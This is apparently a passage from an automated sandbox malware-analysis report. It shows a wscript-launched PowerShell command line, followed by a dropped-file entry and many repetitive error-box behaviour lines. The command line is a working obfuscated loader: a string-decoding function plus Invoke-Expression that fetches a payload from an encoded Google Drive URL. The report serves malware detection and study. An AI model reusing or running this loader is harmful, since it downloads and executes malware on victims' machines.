lm=UnuandCaddioMaskiwkinemnVbnenlDelsao SnivaAtolldTegni&AlumriSm gsdBendi= Paal1 UriniIndtjs RecrL A acUDrapezM.dermSilenFdataiJLige 8Su co9 Dobbm knusOTo fl5ContofOrnam9IngenGLingul TomhoSko euZarisount,uL skdyyRefluVCanon7UdtmtqAdmetEMos itUnderw,avsprDividtFattiRTransuPalma ';$Udviskning=atomangreb 'stose>Nedfr ';$posthume=atomangreb 'BargiiMarkoE SkibX oso ';$Cassina='Kendetegner';$Dentine='\Smaalige.Eks';rme (atomangreb 'Rabat$Noncog Tap lNacroo enlsbE segapsychlStagn:AntisO oodvBo ene alkarForbecPsa ooGrundaM rcet Bire= Dy,t$ .ispeMedionvatikv orev:Tr chaPredapBarfop Scled FraiaMatert eskaaVigil+Bes,a$Dem eDB rmae AndrnSeawat oomsiSpi.nnProloeHa de ');rme (atomangreb ' Viva$PedotgDisselT rmkoSairlb PretaFlig.lClogg: KlasURemain Sregs uspet Hoveu agidSpa ei Op,eeReadodPerp.nSaddueAnke s,oextsKommu=Te,te$DriveB urmarT llgoKarnedBioloeVrlesrHeterinons e,athirOleosnInpute Succ.Illu.s Phy p Swi.lFusibiSerpetEkstr(A ous$Anti,UUnderdG udev,ndiui mprosUnshak OpmanOrga iTroopn J.ckgFarth)Staal ');rme (atomangreb ',arak[ KortNPneumeSo attSkovb.SkrmfSOverpeGarnerEnjoyvSlowmiBauxicU.eskeBrndePUndiso.ealiiFladfn Non tS,okiMPrvepaSquifnPortea GonogDemimeAfspnrOtten] Rip :fagbl: MainSF emmeKontrcBud ruLektir Knowi MldttTo nfyShantPver er KammoSymmet Vo doFl.decstratoStranlModpa Heter=Mini Brneb[drot N,erieeRaah t.umle.ForfrSFiloseMyretcStjfruUdlaarGar liBilbotSpilly tartPHock,rEpicloPapert S lioTagkacFrsteo Li,ilCoh,bT Yanoy aurepBeclaeTypec]Prize:Antnd
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Linnas Kandidtwr overskyet Ecdysial Hjlandene Providentialism Selekteringer #>;$Rystelses='Makeress';<#plungy Firdobling Preferrers Aftvingende Encoders Hardier Forsvarschefernes #>;$Hvsnings=$host.PrivateData;If ($Hvsnings) {$narrishkeit++;}function atomangreb($Antipapistical246){$Bondske=$Fremmeligst+$Antipapistical246.Length-$narrishkeit;for( $Halfheartednesses=5;$Halfheartednesses -lt $Bondske;$Halfheartednesses+=6){$minkfarven+=$Antipapistical246[$Halfheartednesses];}$minkfarven;}function rme($Stillehavsflaadernes){ . ($posthume) ($Stillehavsflaadernes);}$Gulvmaattens=atomangreb 'SpinaMb ugeoSade zSkyldiD.rivlTsarelPartea Hexi/ uror5Angin. Prod0A.tin Manom(skonnWmyoepibarsen MigodUnaudo SulfwSnv.es Lati Kons NBaan.TIniti Kldni1Regis0Bolig.Kirop0Opsam; Civi AntyW Pub iVir,lnWid.w6Rance4 igna;alene A,tabxReemk6Crabb4Speci;Handl IrettrAl,miv Budg:midda1Colpe2N dbr1Bombe. Hosl0Under)Ambit SubelGRenteeU eldcValthkMeethoHyper/In,ho2 Dune0 etnk1 List0 Medb0Nark 1Subef0Alder1 onr WicksFVaginiTwi.trB rguephanefSci,soEnga,xVandl/Gstel1 umsk2 Feri1Skaks.,inkl0 lge ';$librettoens=atomangreb ' alibU Tea,s CirceSui tRBegav- Geopa StorgInhomeIa.hinGarruTDisge ';$Broderierne=atomangreb 'DimplhAntietDistitGastepB,nussKrake:Ungdo/Funkt/Over.d B llr SelviAfd,ivR vieeAfkri.Drogsg RekloBidraoBe,vegIn.mulmarkseR,gnf.FigetcTuberoFamldm tang/.asteuBev.dcP eud?LammieWorkuxUdsk.pDunbaoTilm rRehant P lm=UnuandCaddioMaskiwkinemnVbnenlDelsao SnivaAtolldTegni&AlumriSm gsdBendi= Paal1 UriniIndtjs RecrL A acUDrapezM.dermSilenFdataiJLige 8Su co9 Dobbm knusOTo fl5ContofOrnam9IngenGLingul TomhoSko euZarisount,uL skdyyRefluVCanon7UdtmtqAdmetEMos itUnderw,avsprDividtFattiRTransuPalma ';$Udviskning=atomangreb 'stose>Nedfr ';$posthume=atomangreb 'BargiiMarkoE SkibX oso ';$Cassina='Kendetegner';$Dentine='\Smaalige.Eks';rme (atomangreb 'Rabat$Noncog Tap lNacroo enlsbE segapsychlStagn:AntisO oodvBo ene alkarForbecPsa ooGrundaM rcet Bire= Dy,t$ .ispeMedionvatikv orev:Tr chaPredapBarfop Scled FraiaMatert eskaaVigil+Bes,a$Dem eDB rmae AndrnSeawat oomsiSpi.nnProloeHa de ');rme (atomangreb ' Viva$PedotgDisselT rmkoSairlb PretaFlig.lClogg: KlasURemain Sregs uspet Hoveu agidSpa ei Op,eeReadodPerp.nSaddueAnke s,oextsKommu=Te,te$DriveB urmarT llgoKarnedBioloeVrlesrHeterinons e,athirOleosnInpute Succ.Illu.s Phy p Swi.lFusibiSerpetEkstr(A ous$Anti,UUnderdG udev,ndiui mprosUnshak OpmanOrga iTroopn J.ckgFarth)Staal ');rme (atomangreb ',arak[ KortNPneumeSo attSkovb.SkrmfSOverpeGarnerEnjoyvSlowmiBauxicU.eskeBrndePUndiso.ealiiFladfn Non tS,okiMPrvepaSquifnPortea GonogDemimeAfspnrOtten] Rip :fagbl: MainSF emmeKontrcBud ruLektir Knowi MldttTo nfyShantPver er KammoSymmet Vo doFl.decstratoStranlModpa Heter=Mini Brneb[drot N,erieeRaah t.umle.ForfrSFiloseMyretcStjfruUdlaarGar liBilbotSpilly tartPHock,rEpicloPapert S lioTagkacFrsteo Li,ilCoh,bT Yanoy aurepBeclaeTypec]Prize:AntndJump to behavior
                Source: 31437F.exe.20.drStatic PE information: 0xA39C6329 [Mon Dec 25 02:00:09 2056 UTC]
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848D600BD pushad ; iretd 2_2_00007FF848D600C1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848E34DC9 push ebx; ret 2_2_00007FF848E34F5A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0310326B push cs; iretd 4_2_0310326F
                Source: C:\Windows\SysWOW64\dxdiag.exeFile created: C:\Users\user\AppData\Roaming\188E93\31437F.exeJump to dropped file
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
